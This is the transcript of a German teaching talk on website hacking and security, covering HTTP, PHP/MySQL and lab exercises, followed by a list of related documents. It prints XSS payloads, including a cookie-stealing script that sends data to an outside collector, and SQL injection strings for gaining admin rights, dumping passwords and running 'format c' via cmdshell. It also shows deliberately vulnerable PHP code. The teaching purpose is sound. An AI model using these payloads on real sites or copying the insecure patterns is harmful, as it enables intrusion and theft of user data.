Websitehacking Websitesecurity
|
|
- Reinhold Scholz
- vor 8 Jahren
- Abrufe
Transkript
1 Websitehacking Websitesecurity Psypointer e.v. U23 - Labor Koeln
2 Vortragsinhalte 1 HTTP Grundlagen Was ist HTTP? Aufbau eines/einer HTTP-Requests/Antwort 2 PHP Grundlagen Hallo Welt Variablen, Funktionen MySQL + PHP PHP 3 Angriffsmöglichkeiten Websites Analyse und Angriff XSS SQL-Injections Cookie des Todes URL-Include, sonstige Fehler 4 Hands On Hands On
3 Was ist HTTP? HTTP Hypertext Transfer Protocol Hauptsächlich eingesetzt um Daten in Browser zu laden OSI-Schicht: Applicationlayer Aktuelle Version 1.2, Standard 1.1 keine vollständige Implementierung Zustandsloses Protokoll Einfacher Aufbau, bestehend aus Header und Body Kommunikation meistens über TCP 1989 am CERN entwickelt
4 Aufbau eines/einer HTTP-Requests/Antwort HTTP-Request GET / HTTP/1.1 Host: User-Agent: <h1>["] ;son of Xploison from da - \/ leit kaoz \/ - ;["]</h1> Accept: text/xml,application/xml,application/xhtml+xml, text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO ,utf-8;q=0.7,*;q=0.7 Keep-Alive: 3000 Connection: keep-alive Cookie: SID=xxxxxxxxxxx Cache-Control: max-age=0
5 Aufbau eines/einer HTTP-Requests/Antwort HTTP-Antwort (header) HTTP/1.x 200 OK Cache-Control: private Content-Type: text/html Server: GWS/2.1 Transfer-Encoding: chunked Date: Tue, 05 Sep :46:16 GMT
6 Aufbau eines/einer HTTP-Requests/Antwort HTTP-POST POST /suche/search.php HTTP/1.1 Host: netcologne.de User-Agent: <h1>["] ;son of Xploison from da - \/ leit kaoz \/ - ;["]</h1> Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,... Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO ,utf-8;q=0.7,*;q=0.7 Keep-Alive: 3000 Connection: keep-alive Referer: Cookie: useraccount=%3b<script>alert("fnord") Content-Type: application/x-www-form-urlencoded Content-Length: 56 config=htdig&words=123&start.x=13&start.y=9&start=suchen HTTP/1.x 200 OK Date: Sat, 09 Sep :26:40 GMT Server: Apache/ (Unix) PHP/4.4.2 mod_ssl/ OpenSSL/0.9.6i X-Powered-By: PHP/4.4.2 Keep-Alive: timeout=15, max=6 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html
7 Aufbau eines/einer HTTP-Requests/Antwort HTTP-Methoden GET POST HEAD PUT DELETE TRACE OPTIONS CONNECT
8 Aufbau eines/einer HTTP-Requests/Antwort HTTP-Methoden GET POST HEAD PUT DELETE TRACE OPTIONS CONNECT
9 Aufbau eines/einer HTTP-Requests/Antwort HTTP-Methoden GET POST HEAD PUT DELETE TRACE OPTIONS CONNECT
10 Aufbau eines/einer HTTP-Requests/Antwort HTTP-Methoden GET POST HEAD PUT DELETE TRACE OPTIONS CONNECT
11 Aufbau eines/einer HTTP-Requests/Antwort HTTP Statuscodes Code Bedeutung 1XX Information 2XX Erfolgreiche Operation 3XX Umleitung 4XX (tendenziell) Clientfehler 5XX (tendenziell) Serverfehler
12 Hallo Welt Hello World echo "Hallo Welt\n";
13 Variablen, Funktionen Variablen, Funktionen error_reporting(e_all); $msg = "Hallo Welt!\n"; echo $msg; $foo = array(); $foo[] = "hallo"; $foo[] = "welt"; print_r($foo); $bar = array("hallo","welt"); print_r($bar);
14 Variablen, Funktionen Variablen, Funktionen error_reporting(e_all); $msg = "Hallo Welt!\n"; echo $msg; $foo = array(); $foo[] = "hallo"; $foo[] = "welt"; print_r($foo); $bar = array("hallo","welt"); print_r($bar);
15 MySQL + PHP Verbindung zu einer Mysqldatenbank mit PHP $cfg = array(); $cfg[ user ] = "fnord"; $cfg[ db ] = "fnords_db"; $cfg[ host ] = "localhost"; $cfg[ pw ] = "123osterei"; mysql_connect($cfg[ host ],$cfg[ user ],$cfg[ pw ]) or die(mysql_error()); mysql_select_db($cfg[ db ]) or die(mysql_error()); /* Verbunden... */
16 MySQL + PHP Daten Abholen und Schreiben /* verbindungskram */ $sql = "SELECT newsid, newstext, newsdate FROM news ORDER BY id DESC"; $result = mysql_query($sql) or die(mysql_error()); while($row = mysql_fetch_assoc($result)){ print_r($row); } /* verbindungskram */ $sql = "INSERT INTO news (datum,autorid) VALUES (NOW(), 23 )"; mysql_query($sql) or die(mysql_error());
17 MySQL + PHP Daten Abholen und Schreiben /* verbindungskram */ $sql = "SELECT newsid, newstext, newsdate FROM news ORDER BY id DESC"; $result = mysql_query($sql) or die(mysql_error()); while($row = mysql_fetch_assoc($result)){ print_r($row); } /* verbindungskram */ $sql = "INSERT INTO news (datum,autorid) VALUES (NOW(), 23 )"; mysql_query($sql) or die(mysql_error());
18 MySQL + PHP Wichtige PHP-Funktionen fsockopen() fopen() fputs() fread() fclose() highlight_file() readdir() phpinfo() shell_exec() mysql*
19 MySQL + PHP PHP Sicherheitskonzept Safemode Open Basedir Magic Quoters
20 Analyse und Angriff Voraussetzungen für einen Angriff 1 Linuxkenntnisse Grundkenntnisse Rechte- und Usersystem 2 Analysetools Firefox Webdeveloper Plugin Firefox Liveheader Plugin Ettercap 3 Programmierkenntnisse Kenntnisse der Programmiersprache, in der das Ziel geschrieben ist Kenntnisse einer Programmiersprache für eigene Exploits
21 Analyse und Angriff PHP Sicherheitsprobleme 1 register_globals, magic_quoters 2 Namespacewirrwarr 3 Sehr gesprächig bei Fehlern 4 mächtige Befehle (shell_exec include, eval) 5 Befehlswirrwarr 6 Kein vernünftiges Mysql-Sicherheitskonzept 7 Oft schlampig konfiguriert (Kein Safemode, kein OpenBasedir) 8 Unsichere Extensions ladbar (z.b. GD2 Lib) 9 Einfachheit verleitet zu Dirty Hacks 10 Sehr junge Community
22 Analyse und Angriff register_globals, magic_quoters Register Globals: if($loggedin){ show_adminpanel(); $loggedin = true; } Magic Quoters: $sql = "SELECT * FROM users WHERE name = ".$_POST[ name ]; $result = mysql_query($sql) or die(mysql_error());
23 Analyse und Angriff register_globals, magic_quoters Register Globals: if($loggedin){ show_adminpanel(); $loggedin = true; } Magic Quoters: $sql = "SELECT * FROM users WHERE name = ".$_POST[ name ]; $result = mysql_query($sql) or die(mysql_error());
24 Analyse und Angriff Gesprächige Debugengine /* gefaehrlich */ error_reporting(e_all); /*... */ mysql_query($sql) or die(mysql_error()); /* noch gefaehrlicher */ mysql_query($sql) or die(mysql_error()." SQL: ".$sql);
25 Analyse und Angriff shell_exec(),include, eval() if(isset($_request[ mail ])){ shell_exec("mailsend ".$_REQUEST[ mail ]); } include($_get[ inc ]); include($_get[ inc ].".php"); eval("mymegafunction(".$_get[ id ].")");
26 Analyse und Angriff shell_exec(),include, eval() if(isset($_request[ mail ])){ shell_exec("mailsend ".$_REQUEST[ mail ]); } include($_get[ inc ]); include($_get[ inc ].".php"); eval("mymegafunction(".$_get[ id ].")");
27 Analyse und Angriff shell_exec(),include, eval() if(isset($_request[ mail ])){ shell_exec("mailsend ".$_REQUEST[ mail ]); } include($_get[ inc ]); include($_get[ inc ].".php"); eval("mymegafunction(".$_get[ id ].")");
28 Analyse und Angriff Befehlswirrwarr Beispiele: mysql_escape_string() vs. mysql_real_escape_string() mysql_connect() vs. mysqli_real_connect() vs. mysqli_connect()
29 Analyse und Angriff Unsichere Erweiterungen function Loadpng ($imgname) { $im ($imgname); if (!$im) { $im = ImageCreate (150, 30); $bgc = ImageColorAllocate ($im, 255, 255, 255); $tc = ImageColorAllocate ($im, 0, 0, 0); ImageFilledRectangle ($im, 0, 0, 150, 30, $bgc); ImageString($im,1,5,5,"Fehler beim oeffnen von: $imgname", $tc); } return $im; }
30 Analyse und Angriff Sonstige Fehler Was man nicht sieht, ist auch nicht änderbar (hiddenfields) Eine nicht verlinkte Datei findet man nicht Sorgloser Umgang mit Befehlen Angeben mit Pagestatistiken (Anzahl der Querys, Renderzeit)
31 XSS Was ist XSS? 1 Ziel: Erlangen von Userdaten 2 Methode: Content in einen vertrauenswürdigen Bereich einschleusen
32 XSS Angriffsmöglichkeiten für XSS 1 URL-Angriffe Alle Forms die mit $_GET, $_REQUEST oder bei eingeschaltetem register_globals() verarbeitet werden Suchseiten Fehlerseiten 2 Serverseitige Angriffe Gästebücher Kommentare Trackbacks Usernamen/Daten
33 XSS Angriffsmöglichkeiten für XSS 1 URL-Angriffe Alle Forms die mit $_GET, $_REQUEST oder bei eingeschaltetem register_globals() verarbeitet werden Suchseiten Fehlerseiten 2 Serverseitige Angriffe Gästebücher Kommentare Trackbacks Usernamen/Daten
34 XSS XSS Strings Typischer String zum Testen: > ><h1>test</h1> Einschleusen von Scriptcode: >"><script>alert( Hallo Welt! );</script> <script>(new Image).src = " /s/c.php?c= + escape(document.cookie);</script> Komplette Seite mit eigenem Inhalt ueberdecken: <div style="position:absolute; top:0px; left:0px; background-color:#ffffff; height:100%; width:100%;">willkommen bei AMD</div> Livebeispiel...
35 SQL-Injections SQL-Injection - Angriffswege 1 Veränderung von Daten 2 Ausspähen von Daten 3 Server manipulieren 4 Code oder Daten einschleusen 5 Zeitbasierte Angriffe 6 Adminrechte erlangen 7 Blindinjection 8 Cookies des Todes
36 SQL-Injections Veränderung von Daten Aufruf: Internes Query: SELECT author, subjekt, text FROM artikel WHERE ID=42 Injectaufruf WHERE+ID=23 Internes Query: SELECT author, subjekt, text FROM artikel WHERE ID=42; UPDATE USER SET TYPE="admin" WHERE ID=23
37 SQL-Injections Ausspähen von Daten Aufruf: Internes Query: SELECT author, subjekt, text FROM artikel WHERE ID=42 Injectaufruf password,+ x +FROM+user Internes Query: SELECT author, subjekt, text FROM artikel WHERE ID=42 UNION SELECT login, password, x FROM user
38 SQL-Injections Server manipulieren Aufruf: Internes Query: SELECT url, title FROM myindex WHERE keyword LIKE sql Injectaufruf +;GO+EXEC+cmdshell( format+c )+-- Internes Query: SELECT url, title FROM myindex WHERE keyword LIKE sql ;GO EXEC cmdshell( format C ) --
39 SQL-Injections Code oder Daten einschleusen Aufruf: Internes Query: SELECT author, subjekt, text FROM artikel WHERE ID=42 Injectaufruf +INFILE+ +/dev/urandom+ +INTO+TABLE+FOO; Internes Query: SELECT author, subjekt, text FROM artikel WHERE ID=42; LOAD DATA LOCAL INFILE /dev/urandom INTO TABLE FOO;
40 SQL-Injections Zeitbasierte Angriffe Aufruf um rauszufinden, ob es sich um den Rootuser handelt: SELECT if( user() like benchmark(100000,sha1( test )), false );
41 SQL-Injections Erlangen von Administratorrechten Bei bestimmten Datenbankservern (z.b. Microsoft SQL Server) werden Stored Procedures mitgeliefert, die unter anderem dazu missbraucht werden können, einen neuen Benutzer auf dem angegriffenen System anzulegen. Diese Möglichkeit kann dazu benutzt werden, um zum Beispiel eine Shell auf dem angegriffenen Rechner zu starten.
42 SQL-Injections Blindinjection Von Blind SQL-Injektion spricht man, wenn ein Server keine deskriptive Fehlermeldung zurückliefert aus der hervorgeht, ob der übergebene Query erfolgreich ausgeführt wurde oder nicht. Anhand verschiedenster Kleinigkeiten wie etwa leicht unterschiedlicher Fehlermeldungen oder auch charakteristisch unterschiedlicher Antwortzeiten des Servers kann ein versierter Angreifer häufig dennoch feststellen, ob ein Query erfolgreich war oder einen Fehler zurückmeldet.
43 SQL-Injections Besonders anfällige Stellen (SQL-Injections) Cookies Useragent Selbstgeschrieben Codestücke zu fremder Software
44 Hands On Quellen,Dank Quellen: 1 de.wikipedia.org 2 php.net 3 /dev/brain Dank an: Pylon marcel_ Mario... für die Unterstützung bei der Vorbereitung
45 Hands On Hands On Hosts: 1 Bulgur (Team Gold) 2 Ebli (Team Red) Tasks: Wie lautet das MYSQL-Passwort? Welche User gibt es auf dem Server? Welche Sicherheitslücken hat die Konfiguration? Welche Spuren wurden hinterlassen? Finde die anderen Passwörter
Sicherheit von Webapplikationen Sichere Web-Anwendungen
Sicherheit von Webapplikationen Sichere Web-Anwendungen Daniel Szameitat Agenda 2 Web Technologien l HTTP(Hypertext Transfer Protocol): zustandsloses Protokoll über TCP auf Port 80 HTTPS Verschlüsselt
Mehrphp Hier soll ein Überblick über das Erstellen von php Programmen gegeben werden. Inhaltsverzeichnis 1.Überblick...2 2.Parameterübergabe...
php Hier soll ein Überblick über das Erstellen von php Programmen gegeben werden. Inhaltsverzeichnis 1.Überblick...2 2.Parameterübergabe...7 3.Zugriff auf mysql Daten...11 Verteilte Systeme: php.sxw Prof.
MehrPHP-Schwachstellen und deren Ausnutzung
PHP-Schwachstellen und deren Ausnutzung 44. DFN Betriebstagung / 7. Februar 2006 DFN-CERT Services GmbH Jan Kohlrausch / CSIRT Gliederung Grundlagen HTTP und PHP Anatomie typischer Schwachstellen in PHP-Skripten
MehrRechnernetze Übung 12
Rechnernetze Übung 12 Frank Weinhold Professur VSR Fakultät für Informatik TU Chemnitz Juli 2011 Sie kennen sicherlich sogenannte Web-Mailer, also WWW-Oberflächen über die Sie Emails lesen und vielleicht
MehrWas wissen Google & Co. über mich?
Was wissen Google & Co. über mich? Zwischenfragen sind ausdrücklich erwünscht! http://de.wikipedia.org/wiki/bild:studivz.svg Wer hat einen StudiVZ-Account? Wer hat sich mit der AGB-Änderung befasst? Was
MehrAnleitung zum Prüfen von WebDAV
Anleitung zum Prüfen von WebDAV (BDRS Version 8.010.006 oder höher) Dieses Merkblatt beschreibt, wie Sie Ihr System auf die Verwendung von WebDAV überprüfen können. 1. Was ist WebDAV? Bei der Nutzung des
MehrOP-LOG www.op-log.de
Verwendung von Microsoft SQL Server, Seite 1/18 OP-LOG www.op-log.de Anleitung: Verwendung von Microsoft SQL Server 2005 Stand Mai 2010 1 Ich-lese-keine-Anleitungen 'Verwendung von Microsoft SQL Server
MehrSicherheit in Webanwendungen CrossSite, Session und SQL
Sicherheit in Webanwendungen CrossSite, Session und SQL Angriffstechniken und Abwehrmaßnahmen Mario Klump Die Cross-Site -Familie Die Cross-Site-Arten Cross-Site-Scripting (CSS/XSS) Cross-Site-Request-Forgery
MehrPHP und MySQL. Integration von MySQL in PHP. Zellescher Weg 12 Willers-Bau A109 Tel. +49 351-463 - 32424. Michael Kluge (michael.kluge@tu-dresden.
Zentrum für Informationsdienste und Hochleistungsrechnen (ZIH) PHP und MySQL Integration von MySQL in PHP Zellescher Weg 12 Willers-Bau A109 Tel. +49 351-463 - 32424 (michael.kluge@tu-dresden.de) MySQL
MehrMySQL 101 Wie man einen MySQL-Server am besten absichert
MySQL 101 Wie man einen MySQL-Server am besten absichert Simon Bailey simon.bailey@uibk.ac.at Version 1.1 23. Februar 2003 Change History 21. Jänner 2003: Version 1.0 23. Februar 2002: Version 1.1 Diverse
MehrAnwendungsprotokolle: HTTP, POP, SMTP
Anwendungsprotokolle: HTTP, POP, SMTP TCP? UDP? Socket? eingesetzt, um Webseiten zu übertragen Zustandslos Nutzt TCP Client schickt Anfrage ( HTTP-Request ) an Server, Server schickt daraufhin Antwort
MehrInteraktive Webseiten mit PHP und MySQL
Interaktive Webseiten mit PHP und Vorlesung 4: PHP & Sommersemester 2003 Martin Ellermann Heiko Holtkamp Sommersemester 2001 Hier noch ein wenig zu (My)SQL: SHOW INSERT SELECT ORDER BY GROUP BY LIKE /
MehrProtokolle. Konrad Rosenbaum, 2006/7 protected under the GNU GPL & FDL
TCP/IP: Standard Protokolle Konrad Rosenbaum, 2006/7 DNS - Domain Name System hierarchische, global verteilte Datenbank löst Namen in IP-Adressen auf Host hat einen primären Nameserver, der Fragen selbst
MehrAnleitung zum Prüfen von WebDAV
Brainloop Secure Dataroom Version 8.20 Copyright Brainloop AG, 2004-2014. Alle Rechte vorbehalten. Sämtliche verwendeten Markennamen und Markenzeichen sind Eigentum der jeweiligen Markeninhaber. Inhaltsverzeichnis
MehrDurchführung von Webprojekten. PHP und MySQL
Herbst 2014 Durchführung von Webprojekten PHP und MySQL Wirtschaftsinformatik: 5. Semester Rainer Telesko / Martin Hüsler Fachhochschule Nordwestschweiz FHNW Rainer Telesko / Martin Hüsler 1 Arbeit mit
Mehrmysql - Clients MySQL - Abfragen eine serverbasierenden Datenbank
mysql - Clients MySQL - Abfragen eine serverbasierenden Datenbank In den ersten beiden Abschnitten (rbanken1.pdf und rbanken2.pdf) haben wir uns mit am Ende mysql beschäftigt und kennengelernt, wie man
MehrLehrveranstaltung Grundlagen von Datenbanken
Verbindungsanleitung mit der Datenbank Um sich mit der Datenbank für die Übung zu verbinden, gibt es mehrere Möglichkeiten. Zum einen ist die Datenbank aus dem Netz des Informatikums direkt erreichbar.
MehrVMware vrealize Log Insight- Entwicklerhandbuch
VMware vrealize Log Insight- Entwicklerhandbuch vrealize Log Insight 2.5 Dieses Dokument unterstützt die aufgeführten Produktversionen sowie alle folgenden Versionen, bis das Dokument durch eine neue Auflage
MehrGrundlagen der Informatik 2
Grundlagen der Informatik 2 Dipl.-Inf., Dipl.-Ing. (FH) Michael Wilhelm Hochschule Harz FB Automatisierung und Informatik mwilhelm@hs-harz.de Raum 2.202 Tel. 03943 / 659 338 1 Gliederung 1. Einführung
MehrSage 200 BI Häufige Fehler & Lösungen. Version 15.10.2014
Sage 200 BI Häufige Fehler & Lösungen Version 15.10.2014 Inhaltverzeichnis Sage 200 BI Häufige Fehler & Lösungen Inhaltverzeichnis 2 1.0 Häufige Probleme & Lösungen 3 1.1 Keine Grafiken in SSRS-Auswertungen
MehrAktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen
FAEL-Seminar Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen Prof. Dr. Marc Rennhard Institut für angewandte Informationstechnologie InIT ZHAW Zürcher Hochschule für Angewandte
MehrSicheres HTTP. 8. Juni 2004. Proseminar Electronic Commerce und digitale Unterschriften
Sicheres HTTP 8. Juni 2004 Proseminar Electronic Commerce und digitale Unterschriften Sicheres HTTP HTTP über SSL = sicheres HTTP Überblick HTTP: Protokoll zur Datenübertragung im Internet Klartextprotokoll
MehrSchwachstellenanalyse 2012
Schwachstellenanalyse 2012 Sicherheitslücken und Schwachstellen in Onlineshops Andre C. Faßbender Schwachstellenforschung Faßbender 13.01.2012 Inhaltsverzeichnis 1. Abstract... 3 2. Konfiguration der getesteten
MehrDokumentation für das Web-basierte Abkürzungsverzeichnis (Oracle mod_plsql / Apache)
Dokumentation für das Web-basierte Abkürzungsverzeichnis (Oracle mod_plsql / Apache) vom 8. August 2005 Seite 1 / 7 1.System-Voraussetzungen Um dieses System zu verwenden, muß Oracles HTTP-Server mit dem
MehrMigration Howto. Inhaltsverzeichnis
Migration Howto Migration Howto I Inhaltsverzeichnis Migration von Cobalt RaQ2 /RaQ3 Servern auf 42goISP Server...1 Voraussetzungen...1 Vorgehensweise...1 Allgemein...1 RaQ...1 42go ISP Manager Server...2
MehrScharl 2010 Dokument ist Urheberrechtlich geschützt. Port Forwarding via PuTTY und SSH. Was ist Port forwarding?
Port Forwarding via PuTTY und SSH Was ist Port forwarding? Eine Portweiterleitung (englisch Port Forwarding) ist die Weiterleitung einer Verbindung, die über ein Rechnernetz auf einen bestimmten Port eingeht,
MehrTypo3 - Schutz und Sicherheit - 07.11.07
Typo3 - Schutz und Sicherheit - 07.11.07 1 Angriffe auf Web-Anwendungen wie CMS oder Shop- Systeme durch zum Beispiel SQL Injection haben sich in den letzten Monaten zu einem Kernthema im Bereich IT- Sicherheit
MehrZugriff auf Firebird-Datenbanken mit PHP. Daniel de West DB-Campus-Treffen 15. Januar 2004
Zugriff auf Firebird-Datenbanken mit PHP Daniel de West DB-Campus-Treffen 15. Januar 2004 Inhalt PHP und Firebird Die wichtigsten Befehle Verbindungsaufbau Übermitteln von Abfragen Beenden von Verbindungen
MehrInstallationsanleitung für. SugarCRM Open Source. Windows Einzelplatz
Installationsanleitung für SugarCRM Open Source Windows Einzelplatz Inhaltsverzeichnis Systemvoraussetzungen... 3 WAMP5 Server... 3 Sugar CRM Open Source... 8 SugarCRM Dokumentation... 14 Deutsches Sprachpaket...
MehrAngreifbarkeit von Webapplikationen
Vortrag über die Risiken und möglichen Sicherheitslücken bei der Entwicklung datenbankgestützter, dynamischer Webseiten Gliederung: Einführung technische Grundlagen Strafbarkeit im Sinne des StGB populäre
MehrJoomla!-Sicherheit. von Joomla-Security.de. Jan Erik Zassenhaus & Christian Schmidt. www.joomla-security.de. Seite 1
Joomla!-Sicherheit von Joomla-Security.de Jan Erik Zassenhaus & Christian Schmidt Seite 1 Wollen Sie sowas? Seite 2 PC Passwörter Allgemeines Anti-Viren-Software Firewall Updates des Systems und von der
MehrOptions- und Freitext-Modul Update-Anleitung
Options- und Freitext-Modul Update-Anleitung Hinweis... 2 Update für Versionen kleiner als 1.2.4 auf 1.3.x... 3 Update für Versionen ab 1.2.4 auf 1.3.x... 6 Update für Versionen ab 1.3.x auf 2.x.x... 7
MehrWordpress am eigenen Server installieren
Wordpress am eigenen Server installieren Voraussetzung: Zugang zum Server und einen Datenbanknamen und Datenbankuser 1. Download der aktuellen Wordpress-Version unter http://wpde.org/download/ Die Installation
MehrThemen. Apache Webserver Konfiguration. Verzeichnisse für Web-Applikationen. Server Side Includes
Themen Apache Webserver Konfiguration Verzeichnisse für Web-Applikationen Server Side Includes Apache Webserver Konfiguration des Apache Webservers Server-Einstellungen in der httpd.conf-datei Einteilung
MehrUm DynDNS zu konfigurieren, muss ausschließlich folgendes Menü konfiguriert werden:
1. Konfiguration von DynDNS 1.1 Einleitung Im Folgenden wird die Konfiguration von DynDNS beschrieben. Sie erstellen einen Eintrag für den DynDNS Provider no-ip und konfigurieren Ihren DynDNS Namen bintec.no-ip.com.
MehrWebsites mit Dreamweaver MX und SSH ins Internet bringen
Websites mit Dreamweaver MX und SSH ins Internet bringen 1. Vorüberlegungen Dreamweaver stellt Funktionen bereit, um Websites im Internet zu veröffentlichen. Um diese Funktionen auf Servern des Rechenzentrums
Mehrdesk.modul : WaWi- Export
desk.modul : WaWi- Export Die Schnittstelle besteht aus einem Programm, welches die Daten aus der OfficeLine ausliest und in eine XML-Datei exportiert. Die Schnittstelle ist als ein eigenständiges Programm
MehrWarum beschäftigt sich ein Linux-Systemhaus mit der Installation von OTRS mit einem Microsoft SQL Server?
Vorbemerkung Warum beschäftigt sich ein Linux-Systemhaus mit der Installation von OTRS mit einem Microsoft SQL Server? Da wir schon seit einigen Jahren mit OTRS arbeiteten, hat uns ein Kunde beauftragt,
MehrTheoretische Aspekte
Webserver mit Win32 API Datum: 04.02.03 Autor: Michael Hielscher Homepage: www.genesis-x7.de Theoretische Aspekte Aufbau eines Webservers Als erstes sollte man im Abschnitt Multithreaded SocketServer nachlesen
MehrSQL-Injection. Seite 1 / 16
SQL-Injection Seite 1 / 16 Allgemein: SQL (Structured Query Language) Datenbanksprache zur Definition von Datenstrukturen in Datenbanken Bearbeiten und Abfragen von Datensätzen Definition: SQL-Injection
MehrZugriff auf Daten der Wago 750-841 über eine Webseite
Zugriff auf Daten der Wago 750-841 über eine Webseite Inhaltsverzeichnis Einleitung... 3 Auslesen von Variablen... 4 Programm auf der SPS... 4 XML-Datei auf der SPS... 4 PHP-Script zum Auslesen der XML-Datei...
MehrHow to install freesshd
Enthaltene Funktionen - Installation - Benutzer anlegen - Verbindung testen How to install freesshd 1. Installation von freesshd - Falls noch nicht vorhanden, können Sie das Freeware Programm unter folgendem
MehrZSDGMDZFGW... Zehn Sicherheitsprobleme, die gerne mit dem ZendFramework gebaut werden. Ben Fuhrmannek #phpug-köln 2.10.2009
ZSDGMDZFGW Zehn Sicherheitsprobleme, die gerne mit dem ZendFramework gebaut werden Ben Fuhrmannek #phpug-köln 2.10.2009 Über mich Informatiker Entwickler IT Security 2 TOC Aufbau ZF Problem 1 bis 10 3
MehrMySQL Queries on "Nmap Results"
MySQL Queries on "Nmap Results" SQL Abfragen auf Nmap Ergebnisse Ivan Bütler 31. August 2009 Wer den Portscanner "NMAP" häufig benutzt weiss, dass die Auswertung von grossen Scans mit vielen C- oder sogar
MehrPHPNuke Quick & Dirty
PHPNuke Quick & Dirty Dieses Tutorial richtet sich an all die, die zum erstenmal an PHPNuke System aufsetzen und wirklich keine Ahnung haben wie es geht. Hier wird sehr flott, ohne grosse Umschweife dargestellt
MehrThomas Wagner 2009 (im Rahmen der TA) Installation von MySQL 5.0 und Tomcat 5.5
Thomas Wagner 2009 (im Rahmen der TA) Installation von MySQL 5.0 und Tomcat 5.5 Im Folgenden wird die Installation von MySQL 5.0 und Tomcat 5.0 beschrieben. Bei MySQL Server 5.0 handelt es sich um ein
MehrWeb-Konzepte für das Internet der Dinge Ein Überblick
Web-Konzepte für das Internet der Dinge Ein Überblick Samuel Wieland sawielan@student.ethz.ch ETH Zürich Seminar Das Internet der Dinge Historisches Tim Berners-Lee Erster Web-Server Bildquelle: Wikimedia
MehrMultimedia im Netz Wintersemester 2011/12
Multimedia im Netz Wintersemester 2011/12 Übung 01 Betreuer: Verantwortlicher Professor: Sebastian Löhmann Prof. Dr. Heinrich Hussmann Organisatorisches 26.10.2011 MMN Übung 01 2 Inhalte der Übungen Vertiefung
MehrDatenbanken für Online Untersuchungen
Datenbanken für Online Untersuchungen Im vorliegenden Text wird die Verwendung einer MySQL Datenbank für Online Untersuchungen beschrieben. Es wird davon ausgegangen, dass die Untersuchung aus mehreren
MehrFolien php/mysql Kurs der Informatikdienste
Folien php/mysql Kurs der Informatikdienste 1. Einführung in die Datenbank MySQL Kursbeispiel und Kursziele 1.1 Das Kursbeispiel: eine kleine Personalverwaltung 1.2 Was brauchen wir? 1.3 Ziele Kurs AEMS1,
MehrTYPO3 und TypoScript
TYPO3 und TypoScript Webseiten programmieren, Templates erstellen, Extensions entwickeln von Tobias Hauser, Christian Wenz, Daniel Koch 1. Auflage Hanser München 2005 Verlag C.H. Beck im Internet: www.beck.de
MehrARCHITEKTUR VON INFORMATIONSSYSTEMEN
ARCHITEKTUR VON INFORMATIONSSYSTEMEN File Transfer Protocol Einleitung Das World Wide Web war ja ursprünglich als verteiltes Dokumentenverwaltungssystem für die akademische Welt gedacht. Das Protokoll
MehrDatenbanksysteme SS 2007
Datenbanksysteme SS 2007 Frank Köster (Oliver Vornberger) Institut für Informatik Universität Osnabrück Kapitel 9c: Datenbankapplikationen Architektur einer Web-Applikation mit Servlets, JSPs und JavaBeans
Mehrmysoftfolio360 Handbuch
mysoftfolio360 Handbuch Installation Schritt 1: Application Server und mysoftfolio installieren Zuallererst wird der Application Server mit dem Setup_ApplicationServer.exe installiert und bestätigen Sie
MehrACCOUNTINFO 1.01 VERWENDEN DER ACCOUNTINFO-SCHNITTSTELLE ABFARGE VON ACCOUNT-INFORMATIONEN IN ECHTZEIT 02. MÄRZ 2010
VERWENDEN DER ACCOUNTINFO-SCHNITTSTELLE ABFARGE VON ACCOUNT-INFORMATIONEN IN ECHTZEIT 02. MÄRZ 2010 VERTRIEBLICHE FRAGEN ZUM FITSMS-GATEWAY mpc networks GmbH Abteilung FitSMS Vertrieb tel +49 (0) 7154-17
MehrThemen. Anwendungsschicht DNS HTTP. Stefan Szalowski Rechnernetze Anwendungsschicht
Themen Anwendungsschicht DNS HTTP Anwendungsschicht OSI-Schicht 7, TCP/IP-Schicht 4 Dienste für den Nutzer/Anwender Unabhängig von den niederen Schichten Verschiedene Dienste bzw. Services DNS HTTP FTP,
MehrFolgende Voraussetzungen für die Konfiguration müssen erfüllt sein:
5. HTTP Proxy (Auth User / URL Liste / Datei Filter) 5.1 Einleitung Sie konfigurieren den HTTP Proxy, um die Webzugriffe ins Internet zu kontrollieren. Das Aufrufen von Webseiten ist nur authentifizierten
MehrIcinga Teil 2. Andreas Teuchert. 25. Juli 2014
Icinga Teil 2 Andreas Teuchert 25. Juli 2014 1 Nagios-Plugins Programme, die den Status von Diensten überprüfen können liegen in /usr/lib/nagios/plugins/ werden von Icinga aufgerufen, geben Status über
MehrCLR-Integration im SQL-Server. Alexander Karl
CLR-Integration im SQL-Server Alexander Karl seit der Version SQL-Server 2005 können Programmierungen zusätzlich zum T-SQL auch mit.net-sprachen erfolgen. Data Types Stored Procedures Triggers Functions
MehrInformationstechnik & System-Management SQL INJECTION. Selbstgemachte Sicherheitslücken. SQL-Injection ITSB2006 Michael Donabaum
SQL INJECTION Selbstgemachte Sicherheitslücken Beschreibung SQL-Injection SQL-Einschleusung Ausnutzen von Sicherheitslücken in Zusammenspiel mit SQL-Datenbanken Mangelnde Maskierung von Metazeichen \ ;
MehrSessions mit PHP. Annabell Langs 2004. Sessions in PHP - Annabell Langs 1
Sessions mit PHP Annabell Langs 2004 Sessions in PHP - Annabell Langs 1 Sessions» Inhaltsverzeichnis Wozu Sessions? 3 Wie funktionieren Sessions? 5 Wie kann ich die Session-ID übergeben? 8 Sicherheit 9
MehrTutorial. In diesem Tutorial möchte ich die Möglichkeiten einer mehrspracheigen Web-Site erläutern.
Tutorial In diesem Tutorial möchte ich die Möglichkeiten einer mehrspracheigen Web-Site erläutern. Zu Beginn müssen wir uns über die gewünschten Sprachen Gedanken machen. Zum einem, da eine professionelle
MehrE-Commerce: IT-Werkzeuge. Web-Programmierung. Kapitel 6: Datenbankabfragen mit SQL und PHP. Stand: 24.11.2014. Übung WS 2014/2015
Übung WS 2014/2015 E-Commerce: IT-Werkzeuge Web-Programmierung Kapitel 6: Datenbankabfragen mit SQL und PHP Stand: 24.11.2014 Benedikt Schumm M.Sc. Lehrstuhl für ABWL und Wirtschaftsinformatik Katholische
MehrFachhochschule Kaiserslautern Labor Datenbanken mit MySQL SS2006 Versuch 1
Fachhochschule Kaiserslautern Fachbereiche Elektrotechnik/Informationstechnik und Maschinenbau Labor Datenbanken Versuch 1 : Die Grundlagen von MySQL ------------------------------------------------------------------------------------------------------------
